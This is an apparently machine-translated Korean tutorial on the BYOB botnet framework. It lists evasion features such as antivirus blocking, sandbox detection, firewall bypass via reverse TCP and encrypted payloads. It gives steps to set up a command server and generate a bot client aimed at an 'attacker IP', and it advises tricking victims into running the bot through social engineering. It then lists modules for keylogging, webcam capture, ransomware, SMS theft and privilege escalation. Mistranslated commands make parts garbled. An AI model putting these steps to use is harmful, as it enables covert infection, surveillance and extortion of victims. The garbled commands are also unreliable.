BYOB는 보안 연구원과 개발자가 기본 봇넷을 구축 및 운영하여 이러한 위협에 대한 대응책을 개발하는 능력을 향상시키기 위해 매년 수백만 대의 장치를 감염시키고 최신 봇넷을 생성하는 정교한 맬웨어에 대한 이해를 심화할 수 있는 프레임워크를 제공합니다. 개발자가 처음부터 RAT 또는 Command &Control 서버를 작성할 필요 없이 자신의 코드를 쉽게 구현하고 멋진 새 기능을 추가할 수 있도록 설계되었습니다.
기능
-
디스크에 기록된 내용 없음 − 클라이언트는 디스크에 아무 것도 쓰지 않습니다. 원격 가져오기를 사용하면 임의의 코드를 메모리에 동적으로 로드하고 현재 실행 중인 프로세스로 직접 가져올 수 있기 때문에 임시 파일도 쓰지 않습니다.
-
플랫폼 독립 − 모든 것이 Python으로 작성되었으며 생성된 클라이언트는 선택적으로 이식 가능한 실행 파일(Windows)로 컴파일되거나 독립 실행형 애플리케이션으로 번들될 수 있습니다.
-
방화벽 우회 - 클라이언트는 기본 필터 구성이 주로 들어오는 연결을 차단하기 때문에 대부분의 방화벽을 우회하는 역방향 TCP 연결을 통해 명령 및 제어 서버에 연결합니다.
-
바이러스 백신 대책 − 알려진 안티바이러스 제품의 이름을 가진 프로세스가 생성되는 것을 차단하여 안티바이러스에 의해 분석되는 것을 방지합니다.
-
분석 방지를 위한 페이로드 암호화 - 주 클라이언트 페이로드는 함께 생성되는 페이로드 스테이저에만 존재하는 임의의 256비트 키로 암호화됩니다.
-
역설계 방지 − 기본적으로 가상 머신이나 샌드박스가 감지되면 클라이언트는 실행을 중단합니다.
설치 방법
-
자식 클론 https://github.com/malwaredllc/byob.git
-
CD 바이옵
-
핍 설치 -r 요구 사항.txt
-
파이썬 setup.py
여기에서는 두 개의 터미널이 사용됩니다. 첫 번째 터미널은 세션이 처리될 봇 서버이고 두 번째 터미널은 봇이 생성될 봇 클라이언트입니다.
-
파이썬 server.py – 포트 445
그런 다음 다른 Linux 터미널을 열고 cd /home/cybersecurity/Downloads/byob/byob
를 입력합니다. -
python client.py –이름 testbot.py 192.168.1.10(공격자 IP) 445
위 쿼리를 실행하면 새로운 봇넷이 생성됩니다. 위의 쿼리가 실행됩니다. 이제 사회 공학 트릭을 사용하여 누구나 컴퓨터에서 봇을 열 수 있습니다. 대상 머신에서 testbot.py가 실행되면 봇넷 서버에 세션이 생성됩니다.
이용 후
피해자에서 봇넷을 성공적으로 구성한 후 클라이언트가 원격으로 가져올 수 있는 악용 후 모듈입니다.
-
키로거(byob.modules.keylogger):사용자의 키 입력 및 입력된 창 이름을 기록합니다.
-
스크린샷(byob.modules.screenshot):현재 사용자의 바탕 화면을 스크린샷으로 찍습니다.
-
웹캠(byob.modules.webcam):라이브 스트림을 보거나 웹캠에서 이미지/비디오를 캡처합니다.
-
몸값(byob.modules.ransom):파일 암호화 및 몸값 지불을 위한 임의의 BTC 지갑 생성
-
패킷 스니퍼(byob.modules.packetsniffer):호스트 네트워크 및 upload.pcap 파일에서 패킷 스니퍼 실행
-
지속성(byob.modules.persistence):호스트 시스템에 지속성을 설정합니다.
-
전화(byob.modules.phone):클라이언트 스마트폰에서 문자 메시지 읽기/검색/업로드
-
권한 에스컬레이트(byob.modules.escalate):UAC 우회를 시도하여 무단 관리자 권한을 얻습니다.
-
포트 스캐너(byob.modules.portscanner):로컬 네트워크에서 다른 온라인 장치를 검색하고 포트를 엽니다.
-
프로세스 제어(byob.modules.process):호스트에서 현재 실행 중인 프로세스를 나열/검색/종료/모니터합니다.